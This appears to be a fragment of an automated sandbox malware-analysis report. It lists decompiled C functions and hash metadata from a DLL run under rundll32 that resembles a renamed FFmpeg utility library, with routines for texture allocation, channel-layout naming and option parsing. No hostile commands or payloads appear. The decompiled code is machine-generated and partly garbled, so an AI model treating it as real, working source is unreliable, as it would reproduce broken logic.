                                                                      						return 0xfffffff4;
                                                                      					}
                                                                      				}
                                                                      				if( *__ebx == 0) {
                                                                      					 *_t60 = __ebx + 4;
                                                                      					E100290E0();
                                                                      					 *_t60 =  *((intOrPtr*)(_t60 + 0x50));
                                                                      					E100290E0();
                                                                      				}
                                                                      				 *_t60 =  *((intOrPtr*)(_t60 + 0x28));
                                                                      				L100290D0();
                                                                      				 *_t60 =  *((intOrPtr*)(_t60 + 0x2c));
                                                                      				L100290D0();
                                                                      				goto L4;
                                                                      			}





                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: strlen$_aligned_reallocmv_freepmv_realloc
                                                                      • String ID:
                                                                      • API String ID: 895301365-0
                                                                      • Opcode ID: d1a8473bf65fe5948635b3fdb6a704e42311342a774be7d21ac7218014880f97
                                                                      • Instruction ID: 4ab28d8c1afc1d5d21c0288313e81dd6decefd2b0a989d53a21eca3f7d4547be
                                                                      • Opcode Fuzzy Hash: d1a8473bf65fe5948635b3fdb6a704e42311342a774be7d21ac7218014880f97
                                                                      • Instruction Fuzzy Hash: 2F21AEB8908316CFCB54DF28C08095AB7E5FF89344F558A5DE999AB301D731EA46CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: _lock_unlockcalloc
                                                                      • String ID:
                                                                      • API String ID: 3876498383-0
                                                                      • Opcode ID: 0688a122be4117893fb3ece507c896a8d7c3e445b4a648a9370480a80a91a21a
                                                                      • Instruction ID: 8fe92059074c50cb47f0fafd9c3e369871995c2eed6e667d345993090a648f63
                                                                      • Opcode Fuzzy Hash: 0688a122be4117893fb3ece507c896a8d7c3e445b4a648a9370480a80a91a21a
                                                                      • Instruction Fuzzy Hash: A81149B1604305CFDB80DFA8C48475ABBE0EF88340F15C6A9E888CF245EB74D840CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_bprint_escape.F086 ref: 100122B3
                                                                        • Part of subcall function 10009730: mv_bprintf.F086(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097FB
                                                                      • mv_bprint_append_data.F086 ref: 100122CC
                                                                      • mv_bprint_escape.F086 ref: 100122EE
                                                                      • mv_bprint_finalize.F086 ref: 1001231B
                                                                      • mv_bprint_append_data.F086 ref: 1001234B
                                                                        • Part of subcall function 10008F30: mv_realloc.F086 ref: 10008F73
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_bprint_append_datamv_bprint_escape$mv_bprint_finalizemv_bprintfmv_realloc
                                                                      • String ID:
                                                                      • API String ID: 1942445456-0
                                                                      • Opcode ID: 5e9e0b7bf5f3d5346bbbc040ec1caf168d6988dfb1b18155a4329e28a55b4eeb
                                                                      • Instruction ID: 403ebcfaa7f6bf6d2df9c5cc3f9910434a712b72dc8362acc2447b37bc06364c
                                                                      • Opcode Fuzzy Hash: 5e9e0b7bf5f3d5346bbbc040ec1caf168d6988dfb1b18155a4329e28a55b4eeb
                                                                      • Instruction Fuzzy Hash: 752199B59183019FD360DF29C08069AFBE1FB89348F50892EE58CC7301E736E981CB46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 54%
                                                                      			E1001F3B7(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
                                                                      				intOrPtr* _t61;
                                                                      				intOrPtr _t62;
                                                                      				intOrPtr* _t72;
                                                                      				intOrPtr _t77;
                                                                      				intOrPtr* _t95;
                                                                      				intOrPtr _t98;
                                                                      				intOrPtr _t101;
                                                                      				intOrPtr* _t102;
                                                                      				intOrPtr* _t104;
                                                                      				intOrPtr* _t105;
                                                                      
                                                                      				 *((intOrPtr*)(_t104 + 0x4c)) = __ebx;
                                                                      				_t77 =  *((intOrPtr*)(_t104 + 0x60));
                                                                      				 *((intOrPtr*)(_t104 + 0x58)) = _t101;
                                                                      				 *((intOrPtr*)(_t104 + 0x54)) = __edi;
                                                                      				 *((intOrPtr*)(_t104 + 0x50)) = __esi;
                                                                      				_t102 =  *((intOrPtr*)(_t77 + 0x10));
                                                                      				_t95 =  *_t102;
                                                                      				_t98 =  *((intOrPtr*)( *((intOrPtr*)(_t77 + 4)) + 4));
                                                                      				if(_t95 == 0) {
                                                                      					 *((intOrPtr*)(_t104 + 0x2c)) = 0;
                                                                      					 *((intOrPtr*)(_t104 + 0x30)) = 0;
                                                                      					 *((intOrPtr*)(_t104 + 0x38)) = 0;
                                                                      					 *((intOrPtr*)(_t104 + 0x18)) =  *((intOrPtr*)(_t77 + 0x30));
                                                                      					 *((intOrPtr*)(_t104 + 0x14)) =  *((intOrPtr*)(_t77 + 0x2c));
                                                                      					 *((intOrPtr*)(_t104 + 0x1c)) = 1;
                                                                      					 *((intOrPtr*)(_t104 + 0x20)) = 1;
                                                                      					 *((intOrPtr*)(_t104 + 0x28)) = 1;
                                                                      					 *((intOrPtr*)(_t104 + 0x24)) =  *((intOrPtr*)(_t98 + 8));
                                                                      					 *((intOrPtr*)(_t104 + 0x34)) =  *((intOrPtr*)(_t102 + 4));
                                                                      					 *((intOrPtr*)(_t104 + 0x3c)) =  *((intOrPtr*)(_t102 + 8));
                                                                      					_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t77 + 0xc)) + 0xc))));
                                                                      					 *((intOrPtr*)(_t104 + 0xc)) = _t104 + 0x10;
                                                                      					 *((intOrPtr*)(_t104 + 8)) = 0;
                                                                      					 *((intOrPtr*)(_t104 + 4)) = _t104 + 0x14;
                                                                      					 *_t104 = _t61;
                                                                      					_t62 =  *((intOrPtr*)( *_t61 + 0x14))();
                                                                      					_t105 = _t104 - 0x10;
                                                                      					if(_t62 < 0) {
                                                                      						 *((intOrPtr*)(_t105 + 0xc)) = _t62;
                                                                      						 *(_t105 + 8) = "Could not create the texture (%lx)\n";
                                                                      						 *((intOrPtr*)(_t105 + 4)) = 0x10;
                                                                      						 *_t105 = _t77;
                                                                      						E10026560();
                                                                      					} else {
                                                                      						_t95 = E1001F080(_t77, _t77, 0,  *((intOrPtr*)(_t105 + 0x10)), _t95, _t98, _t102);
                                                                      					}
                                                                      				} else {
                                                                      					 *((intOrPtr*)(_t104 + 4)) = _t104 + 0x14;
                                                                      					 *_t104 = _t95;
                                                                      					 *((intOrPtr*)( *_t95 + 0x28))();
                                                                      					_t105 = _t104 - 8;
                                                                      					if( *((intOrPtr*)(_t98 + 4)) >=  *((intOrPtr*)(_t105 + 0x20))) {
                                                                      						 *_t105 = _t77;
                                                                      						 *(_t105 + 8) = "Static surface pool size exceeded.\n";
                                                                      						_t95 = 0;
                                                                      						 *((intOrPtr*)(_t105 + 4)) = 0x10;
                                                                      						E10026560();
                                                                      					} else {
                                                                      						_t72 =  *_t102;
                                                                      						 *_t105 = _t72;
                                                                      						 *((intOrPtr*)( *_t72 + 4))();
                                                                      						_t105 = _t105 - 4;
                                                                      						_t95 = E1001F080(_t77, _t77,  *((intOrPtr*)(_t98 + 4)),  *_t102, _t95, _t98, _t102);
                                                                      					}
                                                                      				}
                                                                      				return _t95;
                                                                      			}














                                                                      APIs
                                                                      • mv_log.F086 ref: 1001F4EF
                                                                        • Part of subcall function 1001F080: mv_mallocz.F086 ref: 1001F0A0
                                                                        • Part of subcall function 1001F080: mv_realloc_f.F086 ref: 1001F0DD
                                                                        • Part of subcall function 1001F080: mv_buffer_create.F086 ref: 1001F128
                                                                      Strings
                                                                      • Could not create the texture (%lx), xrefs: 1001F504
                                                                      • Static surface pool size exceeded., xrefs: 1001F4DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_buffer_createmv_logmv_malloczmv_realloc_f
                                                                      • String ID: Could not create the texture (%lx)$Static surface pool size exceeded.
                                                                      • API String ID: 22886632-350389734
                                                                      • Opcode ID: 12dea1e201e8f5d438329ade5418983e4152c6497013e786b6b6d990fad55280
                                                                      • Instruction ID: d0ee2a216646596517f8e2272bb6c8791eb02a2e11f7fe46a603028adb549b45
                                                                      • Opcode Fuzzy Hash: 12dea1e201e8f5d438329ade5418983e4152c6497013e786b6b6d990fad55280
                                                                      • Instruction Fuzzy Hash: 5C4188B5A087419FC744DF29C58061ABBE1FF88700F51896EF8999B316E774E984CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E1000D684(void* __edi) {
                                                                      				void* _t75;
                                                                      
                                                                      				while(1) {
                                                                      					L16:
                                                                      					__eax =  *(__edi + 8);
                                                                      					__ebx = __ebp;
                                                                      					__edx =  *(__edi + 0xc);
                                                                      					__esp[4] =  *(__edi + 8);
                                                                      					__esp[5] =  *(__edi + 0xc);
                                                                      					while(1) {
                                                                      						__esp[7] = __ebp;
                                                                      						__eax = __esp[4];
                                                                      						__ecx = 0;
                                                                      						__edx = __esp[5];
                                                                      						__ebp = __edi;
                                                                      						do {
                                                                      							L20:
                                                                      							__edi = __edx;
                                                                      							__esi = __eax;
                                                                      							__esi = (__edi << 0x00000020 | __eax) >> __cl;
                                                                      							__edi = __edi >> __cl;
                                                                      							if((__cl & 0x00000020) != 0) {
                                                                      								__esi = __edi;
                                                                      							}
                                                                      							__esi = __esi & 0x00000001;
                                                                      							if(__esi == 0) {
                                                                      								goto L19;
                                                                      							}
                                                                      							_t31 = __ebx - 1; // 0x0
                                                                      							__esi = _t31;
                                                                      							if(__ebx != 0) {
                                                                      								__ebx = __esi;
                                                                      								goto L19;
                                                                      							}
                                                                      							__edi = __ebp;
                                                                      							__ebp = __esp[7];
                                                                      							if(__ebp != 0) {
                                                                      								__esp[4] = __ecx;
                                                                      								__eax = 0x100b1acf;
                                                                      								__esp[1] = 0x100b1acf;
                                                                      								__eax = __esp[6];
                                                                      								 *__esp = __esp[6];
                                                                      								__eax = L100089C0();
                                                                      								__ecx = __esp[4];
                                                                      								L38:
                                                                      								if(__ecx <= 0x28) {
                                                                      									L26:
                                                                      									__eax =  *(0x100b2280 + __ecx * 8);
                                                                      									if(__eax == 0) {
                                                                      										L32:
                                                                      										__esp[2] = __ecx;
                                                                      										__eax = __esp[6];
                                                                      										__ebx = "USR%d";
                                                                      										__esp[1] = "USR%d";
                                                                      										 *__esp = __esp[6];
                                                                      										__eax = L100089C0();
                                                                      										L10:
                                                                      										while(1) {
                                                                      											L10:
                                                                      											if( *__edi != 2) {
                                                                      												L3:
                                                                      												__esi =  *(__edi + 4);
                                                                      												__ebp = __ebp + 1;
                                                                      												if(__esi <= __ebp) {
                                                                      													L14:
                                                                      													if(__esi == 0) {
                                                                      														__eax = 0;
                                                                      														__esp[2] = 0;
                                                                      														__eax = "%d channels";
                                                                      														__esp[1] = "%d channels";
                                                                      														__eax = __esp[6];
                                                                      														 *__esp = __esp[6];
                                                                      														L100089C0() = 0;
                                                                      													} else {
                                                                      														__eax = __esp[6];
                                                                      														__edx = 0x100b1ad1;
                                                                      														__esp[1] = 0x100b1ad1;
                                                                      														 *__esp = __esp[6];
                                                                      														L100089C0() = 0;
                                                                      													}
                                                                      													return _t75;
                                                                      												}
                                                                      												L4:
                                                                      												if(__ebp >= __esi) {
                                                                      													L42:
                                                                      													__eax = 0x100b1acf;
                                                                      													__esp[1] = 0x100b1acf;
                                                                      													__eax = __esp[6];
                                                                      													 *__esp = __esp[6];
                                                                      													__eax = L100089C0();
                                                                      													L9:
                                                                      													__eax = __esp[6];
                                                                      													__esi = "NONE";
                                                                      													__esp[1] = "NONE";
                                                                      													 *__esp = __esp[6];
                                                                      													__eax = L100089C0();
                                                                      													continue;
                                                                      												}
                                                                      												__eax =  *__edi;
                                                                      												if(__eax == 2) {
                                                                      													__edx =  *(__edi + 8);
                                                                      													__eax = __ebp + __ebp * 2;
                                                                      													__eax =  *(__edi + 8) + (__ebp + __ebp * 2) * 8;
                                                                      													__ecx =  *( *(__edi + 8) + (__ebp + __ebp * 2) * 8);
                                                                      													__ebx = __ecx - 0x400;
                                                                      													if(__ebp != 0) {
                                                                      														__esp[4] = __ecx;
                                                                      														__eax = 0x100b1acf;
                                                                      														__esp[1] = 0x100b1acf;
                                                                      														__eax = __esp[6];
                                                                      														 *__esp = __esp[6];
                                                                      														__eax = L100089C0();
                                                                      														__ecx = __esp[4];
                                                                      													}
                                                                      													if(__ebx > 0x3ff) {
                                                                      														goto L38;
                                                                      													}
                                                                      													L36:
                                                                      													__esp[2] = __ebx;
                                                                      													__eax = "AMBI%d";
                                                                      													__esp[1] = "AMBI%d";
                                                                      													__eax = __esp[6];
                                                                      													 *__esp = __esp[6];
                                                                      													__eax = L100089C0();
                                                                      													continue;
                                                                      												}
                                                                      												if(__eax == 3) {
                                                                      													__eax =  *(__edi + 8);
                                                                      													__edx =  *(__edi + 0xc);
                                                                      													__esp[4] = __eax;
                                                                      													__ebx = __eax;
                                                                      													__ecx = __eax;
                                                                      													__esp[5] =  *(__edi + 0xc);
                                                                      													__eax >> 1 = __eax >> 0x00000001 & 0x55555555;
                                                                      													__ecx = __eax - (__eax >> 0x00000001 & 0x55555555);
                                                                      													__ebx = __ecx;
                                                                      													__ecx = __ecx >> 2;
                                                                      													__ebx = __ebx & 0x33333333;
                                                                      													__ecx = __ecx & 0x33333333;
                                                                      													__ecx =  &(__ecx[__ebx]);
                                                                      													__ecx = __ecx >> 4;
                                                                      													__ecx =  &(__ecx[__ecx >> 4]);
                                                                      													__ecx = __ecx & 0x0f0f0f0f;
                                                                      													__ebx =  &(__ecx[__ecx >> 8]);
                                                                      													__ecx = __esp[5];
                                                                      													__eax = __ebx;
                                                                      													__ecx = __ecx >> 1;
                                                                      													__ecx >> 1 = __ecx >> 0x00000001 & 0x55555555;
                                                                      													__ecx = __ecx - (__ecx >> 0x00000001 & 0x55555555);
                                                                      													__eax = __eax >> 0x10;
                                                                      													__edx = __ecx;
                                                                      													__ecx = __ecx >> 2;
                                                                      													__edx = __edx & 0x33333333;
                                                                      													__ecx = __ecx & 0x33333333;
                                                                      													__ebx = (__eax >> 0x10) + __eax;
                                                                      													__ecx =  &(__ecx[__edx]);
                                                                      													__eax = (__eax >> 0x10) + __eax;
                                                                      													__edx = __ecx;
                                                                      													__eax = __eax & 0x0000003f;
                                                                      													__edx = __ecx >> 4;
                                                                      													__ecx =  &(__ecx[__ecx >> 4]);
                                                                      													__ecx = __ecx & 0x0f0f0f0f;
                                                                      													__ecx = __ecx >> 8;
                                                                      													__ecx =  &(__ecx[__ecx >> 8]);
                                                                      													__ecx = __ecx >> 0x10;
                                                                      													__ebx =  &(__ecx[__ecx >> 0x10]);
                                                                      													__ebx =  &(__ecx[__ecx >> 0x10]) & 0x0000003f;
                                                                      													__ecx = __eax + ( &(__ecx[__ecx >> 0x10]) & 0x0000003f);
                                                                      													__ebx = __ebp;
                                                                      													__esi = __esi - __ecx;
                                                                      													__ebx = __ebp - __esi;
                                                                      													if(__ebp >= __esi) {
                                                                      														__esp[7] = __ebp;
                                                                      														__eax = __esp[4];
                                                                      														__ecx = 0;
                                                                      														__edx = __esp[5];
                                                                      														__ebp = __edi;
                                                                      														goto L20;
                                                                      													}
                                                                      													__ebx = 0;
                                                                      													if(__ebp == 0) {
                                                                      														goto L36;
                                                                      													}
                                                                      													__eax = 0x100b1acf;
                                                                      													__ebx = __ebp;
                                                                      													__esp[1] = 0x100b1acf;
                                                                      													__eax = __esp[6];
                                                                      													_t46 = __ebp + 0x400; // 0x401
                                                                      													__ecx = _t46;
                                                                      													__esp[4] = _t46;
                                                                      													 *__esp = __esp[6];
                                                                      													__eax = L100089C0();
                                                                      													__ecx = __esp[4];
                                                                      													if(__ebp <= 0x3ff) {
                                                                      														goto L36;
                                                                      													}
                                                                      													goto L32;
                                                                      												}
                                                                      												if(__eax == 0) {
                                                                      													goto L16;
                                                                      												}
                                                                      												if(__ebp != 0) {
                                                                      													goto L42;
                                                                      												}
                                                                      												goto L9;
                                                                      											}
                                                                      											__edx =  *(__edi + 8);
                                                                      											__eax = __ebp + __ebp * 2;
                                                                      											__ecx = __edx + __eax * 8;
                                                                      											if( *((char*)(__edx + 4 + __eax * 8)) == 0) {
                                                                      												goto L3;
                                                                      											}
                                                                      											__eax = __esp[6];
                                                                      											__ecx =  &(__ecx[4]);
                                                                      											__ebp = __ebp + 1;
                                                                      											__esp[2] = __ecx;
                                                                      											__ecx = "@%s";
                                                                      											__esp[1] = "@%s";
                                                                      											 *__esp = __esp[6];
                                                                      											__eax = L100089C0();
                                                                      											__esi =  *(__edi + 4);
                                                                      											if(__esi > __ebp) {
                                                                      												goto L4;
                                                                      											}
                                                                      											goto L14;
                                                                      										}
                                                                      									}
                                                                      									__esp[2] = __eax;
                                                                      									__eax = "%s";
                                                                      									__esp[1] = "%s";
                                                                      									__eax = __esp[6];
                                                                      									 *__esp = __esp[6];
                                                                      									__eax = L100089C0();
                                                                      									goto L10;
                                                                      								}
                                                                      								if(__ecx != 0xffffffff) {
                                                                      									goto L32;
                                                                      								}
                                                                      								goto L9;
                                                                      							}
                                                                      							if(__ecx > 0x28) {
                                                                      								goto L32;
                                                                      							}
                                                                      							goto L26;
                                                                      							L19:
                                                                      							__ecx =  &(__ecx[1]);
                                                                      						} while (__ecx != 0x40);
                                                                      						__edi = __ebp;
                                                                      						__ebp = __esp[7];
                                                                      						if(__ebp == 0) {
                                                                      							goto L9;
                                                                      						}
                                                                      						goto L42;
                                                                      					}
                                                                      				}
                                                                      			}




                                                                      0x00000000
                                                                      0x1000d8b8
                                                                      0x1000d698

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_bprintf
                                                                      • String ID: @%s
                                                                      • API String ID: 3083893021-2921637043
                                                                      • Opcode ID: c4bd400a84f836f8168436f958854a5664bfff359e734bd969f61d6a5558c79a
                                                                      • Instruction ID: bde4f2789606c19ab050fa63e9045ae12eeb8ea4b86e9135c35405d0853ffa6a
                                                                      • Opcode Fuzzy Hash: c4bd400a84f836f8168436f958854a5664bfff359e734bd969f61d6a5558c79a
                                                                      • Instruction Fuzzy Hash: 89215A759097068BE310EF19C48026EF7E1FF88394F12892EE88897315E731ED44CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_expr_parse_and_eval.F086 ref: 10031179
                                                                        • Part of subcall function 100177F0: mv_expr_parse.F086 ref: 10017862
                                                                        • Part of subcall function 100177F0: mv_expr_free.F086 ref: 100178D7
                                                                        • Part of subcall function 100177F0: mv_expr_free.F086 ref: 100178E6
                                                                        • Part of subcall function 100177F0: mv_expr_free.F086 ref: 100178F5
                                                                        • Part of subcall function 100177F0: mv_freep.F086 ref: 10017904
                                                                        • Part of subcall function 100177F0: mv_freep.F086 ref: 1001790C
                                                                        • Part of subcall function 100177F0: mv_expr_free.F086 ref: 10017926
                                                                        • Part of subcall function 100177F0: mv_expr_free.F086 ref: 10017935
                                                                        • Part of subcall function 100177F0: mv_expr_free.F086 ref: 10017944
                                                                        • Part of subcall function 100177F0: mv_freep.F086 ref: 10017953
                                                                        • Part of subcall function 100177F0: mv_freep.F086 ref: 1001795B
                                                                      • mv_d2q.F086 ref: 10031195
                                                                      • mv_reduce.F086 ref: 100311E9
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: mv_expr_free$mv_freep$mv_d2qmv_expr_parsemv_expr_parse_and_evalmv_reduce
                                                                      • String ID: %d:%d%c
                                                                      • API String ID: 3833080124-2624059611
                                                                      • Opcode ID: 85f5d36575807e7fafa94c670191ceb92a74355afdc239334235b21a28f3aeeb
                                                                      • Instruction ID: a95d822099c94071c5e8dd7deebf43e7e110092c234b0a376a52b2c466eaaf16
                                                                      • Opcode Fuzzy Hash: 85f5d36575807e7fafa94c670191ceb92a74355afdc239334235b21a28f3aeeb
                                                                      • Instruction Fuzzy Hash: 7B3156B59193419F8741DF29C58014AFBF1BF89681F458D2EF989DB321E7B0E9448B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: mv_log$strcmp
                                                                      • String ID: %-15s
                                                                      • API String ID: 1163046698-755444208
                                                                      • Opcode ID: 67f8d91f5481be5a8abc9581b63586c4f7dabccb4f422c1acad020251f47d285
                                                                      • Instruction ID: a65aa5bdc326f2953bb7a34f6a4e1eb88b94763fe27593f8274a1ef2d068a0ee
                                                                      • Opcode Fuzzy Hash: 67f8d91f5481be5a8abc9581b63586c4f7dabccb4f422c1acad020251f47d285
                                                                      • Instruction Fuzzy Hash: 8E21B774A09B899FCB50CF29D5806AEB7E1FF88740F96881DF99887712D734EC408B42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: strtoul$bsearchmv_logstrspn
                                                                      • String ID: 0123456789ABCDEFabcdef
                                                                      • API String ID: 1580567553-1534423534
                                                                      • Opcode ID: c327318b04b43838116a0972af538bf9c9ae0042157bb8606ce20964d6a13b67
                                                                      • Instruction ID: 475c0a1212074f1c7d46960a65edae6006a24f871e4a86debb08d9146b8ed167
                                                                      • Opcode Fuzzy Hash: c327318b04b43838116a0972af538bf9c9ae0042157bb8606ce20964d6a13b67
                                                                      • Instruction Fuzzy Hash: 932180759087859FD752CFB4818139ABBF0EF892C1F45CA6EE4899F251D738C884CB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: strcmp
                                                                      • String ID: ntsc
                                                                      • API String ID: 1004003707-2045543799
                                                                      • Opcode ID: c2f3f76b493e7ae363ef3bea34b35956eb32799f12b6245bb7e1ae69e1db444d
                                                                      • Instruction ID: 6cea7622dc21b0a8fdc9447b4567d31d915cfc657656d513b1a483a310e5b42b
                                                                      • Opcode Fuzzy Hash: c2f3f76b493e7ae363ef3bea34b35956eb32799f12b6245bb7e1ae69e1db444d
                                                                      • Instruction Fuzzy Hash: 5F112374A083029FD341CF69C4C069BBBE5EF89340F10896AF885CB361D774E996CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B8E8
                                                                        • Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B908
                                                                      • mv_log.F086 ref: 1002D191
                                                                      • mv_log.F086 ref: 1002D1CB
                                                                      Strings
                                                                      • The value set by option '%s' is not an image size., xrefs: 1002D174
                                                                      • Invalid negative size value %dx%d for size '%s', xrefs: 1002D1BB
                                                                      Similarity
                                                                      • API ID: mv_logstrcmp
                                                                      • String ID: Invalid negative size value %dx%d for size '%s'$The value set by option '%s' is not an image size.
                                                                      • API String ID: 3828882664-2712872533
                                                                      • Opcode ID: b31177d7786b4a561955791bd2828fcace0b00fc2088e4f3536eec9f814de66f
                                                                      • Instruction ID: 02b988b28a835c7d36fa6f9bea235d2f97bb535cbcd3440d1fa17c5a1276ff59
                                                                      • Opcode Fuzzy Hash: b31177d7786b4a561955791bd2828fcace0b00fc2088e4f3536eec9f814de66f
                                                                      • Instruction Fuzzy Hash: 8E21D078A087419FC700DF28E49095ABBF5FF89750F85886EF99987760D635EC41CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _errno$mv_small_strptime
                                                                      • String ID: %M:%S
                                                                      • API String ID: 1751681387-2500880230
                                                                      • Opcode ID: c3d908d13c1e039d41a5e226ac4ed468a27b5a4f753288add814200e358970ce
                                                                      • Instruction ID: 5da90234cc48fb51afaae1d0e0c7376ed52327f504ee9011e26ba8ee41a26718
                                                                      • Opcode Fuzzy Hash: c3d908d13c1e039d41a5e226ac4ed468a27b5a4f753288add814200e358970ce
                                                                      • Instruction Fuzzy Hash: 4D010871A09302CFD765DF29C84035FBBE0EB84341F11C82EE899CB220E7309945DB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 16%
                                                                      			E1003024B(intOrPtr* __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr* __ebp, void* __fp0, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, char* _a40, intOrPtr _a44, char _a60) {
                                                                      				intOrPtr* _t27;
                                                                      				intOrPtr _t32;
                                                                      				char* _t36;
                                                                      				intOrPtr* _t40;
                                                                      				intOrPtr _t49;
                                                                      				intOrPtr _t52;
                                                                      				intOrPtr* _t55;
                                                                      				intOrPtr* _t58;
                                                                      				void* _t64;
                                                                      
                                                                      				_t64 = __fp0;
                                                                      				_t55 = __ebp;
                                                                      				_t52 = __esi;
                                                                      				_t49 = __edi;
                                                                      				_t40 = __ebx;
                                                                      				while(1) {
                                                                      					L6:
                                                                      					_a12 = 0;
                                                                      					_a8 = _a4;
                                                                      					_a4 =  *_t55;
                                                                      					_t36 =  &_a60;
                                                                      					 *_t58 = _t36;
                                                                      					_a40 = _t36;
                                                                      					_t32 = E10011210(_t40, _t49, _t52, _t55);
                                                                      					if(_t32 >= 0) {
                                                                      						goto L1;
                                                                      					} else {
                                                                      						break;
                                                                      					}
                                                                      					while(1) {
                                                                      						L1:
                                                                      						_a8 = _t55;
                                                                      						_a12 = 2;
                                                                      						_a4 = 0x100b75dd;
                                                                      						 *_t58 =  *_t40;
                                                                      						_t27 = E100110D0();
                                                                      						_t55 = _t27;
                                                                      						if(_t27 == 0) {
                                                                      							break;
                                                                      						}
                                                                      						_a12 = _t49;
                                                                      						_a8 = _a4;
                                                                      						 *_t58 = _t52;
                                                                      						_a4 =  *_t55;
                                                                      						_t32 = L1002F6A0(_t40, _t49, _t52, _t55, _t64);
                                                                      						if(_t32 == 0xabafb008) {
                                                                      							goto L6;
                                                                      						} else {
                                                                      							if(_t32 >= 0) {
                                                                      								continue;
                                                                      							} else {
                                                                      								_a40 =  &_a60;
                                                                      								L5:
                                                                      								_a44 = _t32;
                                                                      								_a16 = _a4;
